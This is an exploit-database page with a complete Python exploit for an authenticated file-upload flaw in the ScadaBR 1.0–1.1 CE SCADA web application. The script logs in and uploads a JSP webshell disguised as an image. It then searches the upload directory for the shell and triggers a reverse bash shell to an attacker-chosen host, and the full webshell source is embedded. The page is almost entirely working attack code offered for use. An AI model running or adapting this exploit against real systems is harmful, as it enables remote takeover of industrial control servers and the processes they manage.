ScadaBR 1.0 Arbitrary File Upload Authenticated

2021.04.01
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2) # Date: 04/21 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://www.scadabr.com.br/ # Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux # Tested on: Debian9,10~Ubuntu16.04 #!/usr/bin/python import requests,sys,time if len(sys.argv) <=6: print('[x] Missing arguments ... ') print('[>] Usage: python LinScada_RCE.py <TargetIp> <TargetPort> <User> <Password> <Reverse_IP> <Reverse_Port>') print('[>] Example: python LinScada_RCE.py 192.168.1.24 8080 admin admin 192.168.1.50 4444') sys.exit(0) else: time.sleep(1) host = sys.argv[1] port = sys.argv[2] user = sys.argv[3] passw = sys.argv[4] rev_host = sys.argv[5] rev_port = sys.argv[6] flag = False LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm' PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm' banner = ''' +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ | _________ .___ ____________________ | | / _____/ ____ _____ __| _/____ \______ \______ \ | | \_____ \_/ ___\\__ \ / __ |\__ \ | | _/| _/ | | / \ \___ / __ \_/ /_/ | / __ \| | \| | \ | | /_______ /\___ >____ /\____ |(____ /______ /|____|_ / | | \/ \/ \/ \/ \/ \/ \/ | | | | > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload | | > Exploit Author : Fellipe Oliveira | | > Exploit for Linux Systems | +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ ''' def main(): payload = { 'username': user, 'password': passw } print(banner) time.sleep(2) with requests.session() as s: s.post(LOGIN, data=payload) response = s.get(PROTECTED_PAGE) print "[+] Trying to authenticate "+LOGIN+"..." if response.status_code == 200: print "[+] Successfully authenticated! :D~\n" time.sleep(2) else: print "[x] Authentication failed :(" sys.exit(0) burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm" burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------32124376735876620811763441977", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"} burp0_data = "-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_369755\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"webshell.jsp\"\r\nContent-Type: image/png\r\n\r\n <%@page import=\"java.lang.*\"%>\n<%@page import=\"java.util.*\"%>\n<%@page import=\"java.io.*\"%>\n<%@page import=\"java.net.*\"%>\n\n<%\nclass StreamConnector extends Thread {\n InputStream is;\n OutputStream os;\n StreamConnector(InputStream is, OutputStream os) {\n this.is = is;\n this.os = os;\n }\n public void run() {\n BufferedReader isr = null;\n BufferedWriter osw = null;\n try {\n isr = new BufferedReader(new InputStreamReader(is));\n osw = new BufferedWriter(new OutputStreamWriter(os));\n char buffer[] = new char[8192];\n int lenRead;\n while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {\n osw.write(buffer, 0, lenRead);\n osw.flush();\n }\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n try {\n if (isr != null)\n isr.close();\n if (osw != null)\n osw.close();\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n }\n}\n%>\n\n<h1>Payload JSP to Reverse Shell</h1>\n<p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process</p>\n<form method=\"get\">\n\tIP Address<input type=\"text\" name=\"ipaddress\" size=30 value=\"127.0.0.1\"/>\n\tPort<input type=\"text\" name=\"port\" size=10 value=\"1234\"/>\n\t<input type=\"submit\" name=\"Connect\" value=\"Connect\"/>\n</form>\n\n<%\n String ipAddress = request.getParameter(\"ipaddress\");\n String ipPort = request.getParameter(\"port\");\n Socket sock = null;\n Process proc = null;\n if (ipAddress != null && ipPort != null) {\n try {\n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\n System.out.println(\"socket created: \" + sock.toString());\n Runtime rt = Runtime.getRuntime();\n proc = rt.exec(\"/bin/bash\");\n System.out.println(\"process /bin/bash started: \" + proc.toString());\n StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());\n System.out.println(\"outputConnector created: \" + outputConnector.toString());\n StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());\n System.out.println(\"inputConnector created: \" + inputConnector.toString());\n outputConnector.start();\n inputConnector.start();\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n }\n if (sock != null && proc != null) {\n out.println(\"<div class='separator'></div>\");\n out.println(\"<p>Process /bin/bash, running as (\" + proc.toString() + \", is connected to socket \" + sock.toString() + \".</p>\");\n }\n%>\n\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------32124376735876620811763441977--\r\n" getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) print('[>] Attempting to upload .jsp Webshell...') time.sleep(1) print('[>] Verifying shell upload...\n') time.sleep(2) if getdata.status_code == 200: print('[+] Upload Successfuly! \n') for num in range(1,1000): PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num) find = s.get(PATH) if find.status_code == 200: print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)) print('[>] Spawning Reverse Shell...\n') time.sleep(3) burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?ipaddress=%s&port=%s&Connect=Connect" % (num,rev_host,rev_port) burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} r = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) time.sleep(5) if len(r.text) > 401: print('[+] Connection received') sys.exit(0) else: print('[x] Failed to receive reverse connection ...\n') elif num == 999: print('[x] Failed to found Webshell ... ') else: print('Reason:'+getdata.reason+' ') print('Exploit Failed x_x') if __name__ == '__main__': main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top